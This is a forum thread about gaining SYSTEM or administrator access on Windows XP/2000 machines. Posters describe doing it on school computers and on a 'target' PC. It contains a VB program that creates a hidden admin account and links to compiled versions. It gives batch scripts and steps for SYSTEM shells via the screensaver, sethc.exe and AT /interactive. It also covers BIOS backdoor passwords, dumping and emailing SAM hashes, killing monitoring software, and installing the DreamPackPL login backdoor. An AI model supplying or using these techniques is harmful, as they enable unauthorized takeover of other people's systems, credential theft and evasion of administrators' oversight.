Gain SYSTEM/Administrative Access to Windows XP/2000

[therealdonquixote]

You could always write some code into the msgina.dll, what the login is, with a hidden button that run CMD. That'd spawn in SYSTEM.

Sweet idea. Got a file that we might be able to test??

[Arikirangi]

A bios chip cannot be backdoored or cracked on an oem machine. If it is a custom build machine then there are some backdoor passwords out there, but they rarely work. So that leaves you SOL.

Thanks mate.. gave me an Idea. i went to http://www.uktsupport.co.uk/reference/biosp.htm

and found a reasonable list of BD passwords for the award bios.. it seems my target has a cheap MB.. and AWARD_PW worked great.. I have full access now to boot CD / USB and can now go about the simple task of pilfering SAM

BTW it was not a matter of the case being locked but as in most cases the Security camerers make it too "james bond" to open case without bad consequences.

[Deveant]

haha thx for the lockpicking comic, that was pretty interesting, i think though im now gonna be sitting here with my old lockmaster lock tring to pick it all night :P

[Arikirangi]

Oh .. and sorry for multiple posting.. it may be in my case a good idea insert some code into a file an admin would access on login, which would be able to copy the sam to a unsecure part of the OS /email to GMail, whenever the admin logs in so i dont have to keep accessing the PC via boot disk when the admin routinly changes PWD.. that would put me 1 step ahead.

Also I believe the domain admin password is diff to the local PWD in terms of storage of HASH..

Is the domain PWD stored on the local machine in XP / 2k. how easy is the stored domain PWD to the local pwd in terms of HASH?. can these PWDS be broken with normal LM rainbow tables?

[ShadowHax]

Heres a patch code that will add a new username + password, but will ask you for the creds, then it will delete the new admin from the user list, so that it is not visible from the fast-switch menu... Then it will open cmd prompt, not sure what good that will do. I have provided a compiled version of the VB code here: http://www.rrko.com/dev/AddUser.exe

Module HakXP



    Sub Main()



        Console.Write("Enter new username: ")

        Dim uName As String = Console.ReadLine()

        Console.Write("Enter password for " + uName + " : ")

        Dim pWord As String = Console.ReadLine()



        AddUser(uName, pWord)

        RunProcess("C:WINDOWSsystem32", "cmd.exe")   'Will open up a cmd prompt at C:WINDOWSsystem32 



    End Sub



    Sub AddUser(ByVal UserName As String, ByVal Password As String)



        Shell("net user " + UserName + " " + Password + " /add")    'Adds the user "UserName" with password "Password"

        Shell("net localgroup administators " + UserName + " /add") 'Adds "UserName" to the admin group

        Shell("net localgroup users " + UserName + " /delete")      'If Fast-Switching is on, then "UserName" will show up  



    End Sub



    Sub RunProcess(ByVal Path As String, ByVal Exe As String)



        Dim px As New Process



        px.StartInfo.WorkingDirectory = Path

        px.StartInfo.FileName = Exe



        px.Start()





    End Sub



End Module

Another possible approach...

If you were to make a new windows process and create it under the SYSTEM account and set it to automatic, it would automaticly start at load, no matter who was logged in. This good be a possible way to retreive passwords? I'm working on it, have all the code, just need some filler code for the hack

--ShadowHax

[blackdeath42]

Ok

If you have Write access to the registry then this will work:

•Open Regedit

•Go to HKEY_USERS.DEFAULTControl PanelDesktop

•Double click on SCRNSAVE.EXE

•Change logon.scr to cmd.exe

•Change ScreenSaveTimeOut Form 600 to 10

•Save and exit the editer and log out

•After 10 seconds, the cmd prompt should appear and will have system privilages

•Then do the net user hack

•Your done

you can do some pretty neat things with the SCRNSAVE.EXE variable e.g. minesweeper before you log on! :D

[ShadowHax]

I have compiled a screen saver that will open a command prompt when executed

You may have to open taskmgr to kill the scrn saver, cus I made it transparent

Here is the link to the compiled screen saver http://rrko.com/dev/scrncmd.zip

http://rrko.com/dev/AddUser.zip

--ShadowHax

[The Brain]

Does the replacement of either utilman.exe or services.exe need to be a 16-Bit-App?

If not, are there any other restrictions to the file? Could i also simply rename a .bat-File to utilman.exe?

I tried to replace it with Cmd.exe, it seems to be started after pressing [Win]+ but I can't see it?! :(

And BTW: does it also have SYSTEM-Privilieges when started from the Start-Menu?

[m0u53]

copy explorer.exe from C:/WINNT/windows

paste to a folder other than C:/WINNT/windows

rename to explorer.scr right click>install

goto display>screensaver>explorer.scr

restart

have fun

also an idea would be to download pwdump and make a .bat file to dump the passes to the C:/ dir cuz thats what will popup so you can use the passowrd at that time and login to the admin and unlock your acount

i have done this at my school countless times

i went into the regiesty and set it to run every 1 seconds and well yea i have a 2 hour class so do the math :)

XD

-m0u53

[ShadowHax]

The only problem with this is that some "locations" (erm my school) have blocked not only replacing utilman / cmd / service / all other windows apps from being replaced, and they locked off the display settings. The one thing they did forget is Compmgmt.msc though =) Any suggestions on how i could bypass this? without booting a live distro or floppy?

thx

[azurith]

Module HakXP



    Sub Main()



        Console.Write("Enter new username: ")

        Dim uName As String = Console.ReadLine()

        Console.Write("Enter password for " + uName + " : ")

        Dim pWord As String = Console.ReadLine()



        AddUser(uName, pWord)

        RunProcess("C:WINDOWSsystem32", "cmd.exe")   'Will open up a cmd prompt at C:WINDOWSsystem32



    End Sub



    Sub AddUser(ByVal UserName As String, ByVal Password As String)



        Shell("net user " + UserName + " " + Password + " /add")    'Adds the user "UserName" with password "Password"

        Shell("net localgroup administators " + UserName + " /add") 'Adds "UserName" to the admin group

        Shell("net localgroup users " + UserName + " /delete")      'If Fast-Switching is on, then "UserName" will show up 



    End Sub



    Sub RunProcess(ByVal Path As String, ByVal Exe As String)



        Dim px As New Process



        px.StartInfo.WorkingDirectory = Path

        px.StartInfo.FileName = Exe



        px.Start()





    End Sub



End Module

This should make it work under either XP Home or Pro, and the install directory for XP shouldn't matter anymore..

Here's my update:

Module HakXP



    Sub Main()



        Console.Write("Enter new username: ")

        Dim uName As String = Console.ReadLine()

        Console.Write("Enter password for " + uName + " : ")

        Dim pWord As String = Console.ReadLine()



        AddUser(uName, pWord)

        RunProcess("%systemroot%system32", "cmd.exe")   'Will open up a cmd prompt at WINDOWSsystem32



    End Sub



    Sub AddUser(ByVal UserName As String, ByVal Password As String)



        Shell("net user " + UserName + " " + Password + " /add")    'Adds the user "UserName" with password "Password"

        Shell("net localgroup administators " + UserName + " /add") 'Adds "UserName" to the admin group

        Shell("net localgroup users " + UserName + " /delete")      'If Fast-Switching is on, then "UserName" will show up 



    End Sub



    Sub RunProcess(ByVal Path As String, ByVal Exe As String)



        Dim px As New Process



        px.StartInfo.WorkingDirectory = Path

        px.StartInfo.FileName = Exe



        px.Start()





    End Sub



End Module

%systemroot% is the equivelent of typing C:Windows or D:Windows, or whatever drive you installed Windows..

It also doesn't require admin privs, most of the time.

(I'm not sure if it can be disabled.)

Anyways, I hope that helps somewhat.

I think it may also work for Windows NT now also.. If I remember right, I think Windows NT root directory is 'C:WinNT' or something similar. So it should also work..

Could you recompile the code and test it with the new code?

Thankies!

~~Azurith

PS>>

The updated code should make it compatible with NT & XP.

The install drive of Windows should no longer matter.

[The Brain]

Very interessting so far :D

I'm working on a Solution tu put the CMD on the Loginscreen :twisted:

But now that I have Admin-Privileges on the Local-Machine, I'd like to know how to gain those on the domain (like Arikirangi said).

I don't have the possibility of creating a domain here at home, so if anyone has; Is pwdump (or any other tool like that) able, to read out the domain-passwords after you logged into the domain as a "normal"-user and start pwdump afterwards?

I assume it'll only read out the local hashes but I think it's worth a try

[m0u53]

i know for sure if you can pull up command prompt you can edit files..right

so what if one was to have xp/linux/98 on a cd and before a reboot change the boot.ini file to boot off of the cd or flash drive?

also the autoexec.bat couldnt this be tampered with and dosent this run programs or commands before the xp gui screen?

if so that could be tampered with as well

i have a dell laptop issued by our school the 1st semester everyone used net user administrator * to change the admin password and gain "root" then near the end of the 1st semester EVERYONE had halo on thier laptops...this pissed off the admins greatly they took up everyones laptops and put Novell ZenWorks Desktop Management 7 on them and now if a program isnt launched though Novell then it terminates no mater what it is even import programs like updates are denied and then most recently they fux0r1ng took our entire taskbar...and there is only one way out of it

Taskkill /IM <proccesname>

[long story i know but its true sadly]

<--brand new school

this fast lil miracle is the only way anyone can run anything

so what i would do is first create a Bat file

@echo off

tasklist >>Tasks.txt

then looking through the tasks try and point out some key tasks like lets say you find "norton" or something(although i doubt ANY school admin would be retarded enough to run such a evil bl00dsux1ng program) best bet is to google it if it becomes obvous that this program isnt required kill it as soon as possable

then create a bat file contaning

@echo off

TaskKill /IM nortan.exe

if you keep adding to the file then you can make a nice lil bat file that will make you invisable or well sorta

this is good for remote managemnt and other programs they use to moniter your activites and also when you kill these tasks be sure they are really "dead" by running tasklist again

as some programs with fight you tooth and nail to the death or so to speak!

[The Brain]

%systemroot%system32sethc.exe

Replace it with cmd.exe

Boot into Windows and press SHIFT five times. Command Prompt with SYSTEM privileges will pop-up (Not tested).

---

Download DreamPackPL and replace %systemroot%System32sfcfiles.dll with the downloaded one (I'm not sure if it works with Windows XP, I only tested it in my W2K).

---

Download WinlogonHijack and run it from a Service or anything else with SYSTEM-Privileges (I didn't test it yet, but the author claims it to work 100%). It'll log all passwords of logins to a file (But I don't know, if it catches network-pws (i.e. Domain-pws) too).

--- ---

Now I've got a question:

kickarse posted a link to a nice paper about NT's login. Now, does anybody have a link to a similar paper about W2K, XP or maybe even Vista?

Also I'd like to know if the password for domain-logins are saved anywehere (cached or just temporary in memory)? If so, it should be possible to save them anyhow . :twisted:

L0phtcrack Crew wrote a Utility to catch these passwords in a NT-Network, it's called something like Blabla SMB ... maybe there's a new Version available?

Let me know and thanks :D

[GonZor]

This is a great idea, I ran into a couple of problems so I thought I would share my solutions. First of all I'd like to say that I am aware most people will not have access to the AT command, but for the few people that may be in a similar situation as me...

My Situation: I DO NOT have Local Admin privileges but I do have higher privileges than standard users, I need access to a system cmd to bypass policy without drawing attention to myself from other students. I am unable to simply replace the file from windows and booting from another media is not possible.

Ok anyone thats in a similar situation to me, heres my solution

@ECHO off

ECHO @ECHO off>%systemroot%sethc.bat
ECHO REN %systemroot%system32sethc.exe sethc.bak>>%systemroot%sethc.bat
ECHO COPY %systemroot%system32cmd.exe %systemroot%system32sethc.exe>>%systemroot%sethc.bat
ECHO DEL %systemroot%sethc.bat /q

SET /a nextmin=(%time:~3,2% + 1)
SET newtime=%time:~0,3%%nextmin%

AT %newtime% /interactive %systemroot%sethc.bat

Fairly simple code.... VERY simple code... but if anyone wants an explanation let me know. I'm just too lazy to do it right now.

NOTE - I purposely used cmd i am aware i could just create a Local Admin account but that is not what i need.

EDIT - Just to clarify I could just use

SET /a nextmin=(%time:~3,2% + 1)
SET newtime=%time:~0,3%%nextmin%

AT %newtime% /interactive cmd

but I want to be able to close the cmd prompt easily and reopen it when necessary which is why I chose the longer version.

If you would like the restore file here it is I forgot to post it because I don't have a need for it

@ECHO off
DEL %systemroot%system32sethc.exe
REN %systemroot%system32sethc.bak sethc.exe

[amish]

Well what I do is this. I made a mall bat file with this code.

 
time 12:20:00
at 12:30 /INTERACTIVE cmd.exe /k NET TIME bournside4 /SET /YES
time 12:29:58

Spawns an admin shell in 2 seconds, and becuase my school has a time server i can sync the time back :D But your school wont have one i dont think. So you will need to note the time and reset it manually with the "time" command.

 
time 12:20:00
at 12:30 /INTERACTIVE cmd.exe /k dir
time 12:29:58

The above code you can use and will work on anycomputer anywhere.

[GonZor]

...Spawns an admin shell in 2 seconds, and becuase my school has a time server i can sync the time back :D But your school wont have one i dont think. So you will need to note the time and reset it manually with the "time" command...

Actually my school does sync the time bu I also use this in other locations, I did add a line of code to mine but didn't see the need to update my previous post...

TIME = %newtime%

Which will execute immediately, but your idea of changing the time back can be easily implemented if you add these three lines to the end of my code (excluding the line above)

SET proptime=%time%
TIME = %newtime%
TIME = %proptime%

In which case the %newtime% variable/calculation becomes redundant because the time will be change back anyway and only be a second out, but if that second is worthy to you you could correct it...

[Anthrax]

i had an idea the other day.

assuming you find a locked computer with admin rights.

is it possible to put one of these executables on a flash drive so when you insert the flash drive it automatically runs the .exe?

1. not sure if you can launch a process while the computer is locked.

2. not sure on how the autorun feature will react.

maybe someone would like to give this ago.

[lord]

thought for the first day i may contribute . . . . .

ACCESS ADMINISTRATORS ACCOUNT.

1.  Get physical access to the machine.  Remember that it must have a CD or DVD drive.

2.  Download DreamPackPL from Official website or from Rapidshare OR CLICK ON THE LINK(Go here hxxp: www. d--b. webpark. pl/dreampackpl_en. htm).

3.  Unzip the downloaded dreampackpl_iso. zip and you'll get dreampackpl. ISO.

4.  Use any burning program that can burn ISO images.

5.  After you have the disk, boot from the CD or DVD drive.  You will see Windows 2000 Setup and it will load some files.

6.  Press "R" to install DreamPackPL.

7.  Press "C" to install DreamPackPL by using the recovery console.

8.  Select the Windows installation that is currently on the computer (Normally is "1" if you only have one Windows installed)

9.  Backup your original sfcfiles. dll by typing:

"ren C:WindowsSystem32sfcfiles. dll sfcfiles. lld" (without quotes)

10.  Copy the hacked file from CD to system32 folder.  Type:

"copy D:i386pinball. ex_ C:WindowsSystem32sfcfiles. dll" (without quotes and assuming your CD drive is D:)

11.  Type "exit", take out disk and reboot.

12.  In the password field, type "dreamon" (without quotes) and DreamPack menu will appear.

13.  Click the top graphic on the DreamPack menu and you will get a menu popup.

14.  Go to commands and enable the options and enable the god command.

15.  Type "god" in the password field to get in Windows.

You can also go to Passwords and select "Logon with wrong password and hash".  This option allows you to login with ANY password

[The Brain]

I mentioned it above  8-)

But does this also work with network-login? Anyone tested so far?

[GonZor]

I mentioned it above  8-)

But does this also work with network-login? Anyone tested so far?

It all depends on the intelligence of the System Admin,If they are smart the passwords wont be cached but many System Admins are stupid and leave the passwords cached

[XxSnipedYouxX]

Can't you do this easily by booting into safe mode, then opening control panel, going to user accounts, clicking on your account, then on change account type, and change to system administrator so you can bypass all this stuff.  I don't know if it works on other systems, but it works on mine.

[GonZor]

Can't you do this easily by booting into safe mode, then opening control panel, going to user accounts, clicking on your account, then on change account type, and change to system administrator so you can bypass all this stuff.  I don't know if it works on other systems, but it works on mine.

Wouldn't that require already having the pass? ;)

[XxSnipedYouxX]

I just tried it and it worked, but then again when I went to log on a just clicked on the administrator account and it wasn't password protected so and I couldn't try it on another account because all of them have admin access. You could always give it a try if you want to though.

[GonZor]

I just tried it and it worked, but then again when I went to log on a just clicked on the administrator account and it wasn't password protected so and I couldn't try it on another account because all of them have admin access. You could always give it a try if you want to though.

I know it wont work, well at least not on any of my machines, all my accounts have passwords. This method relies on computers not having an admin password which everyone should have.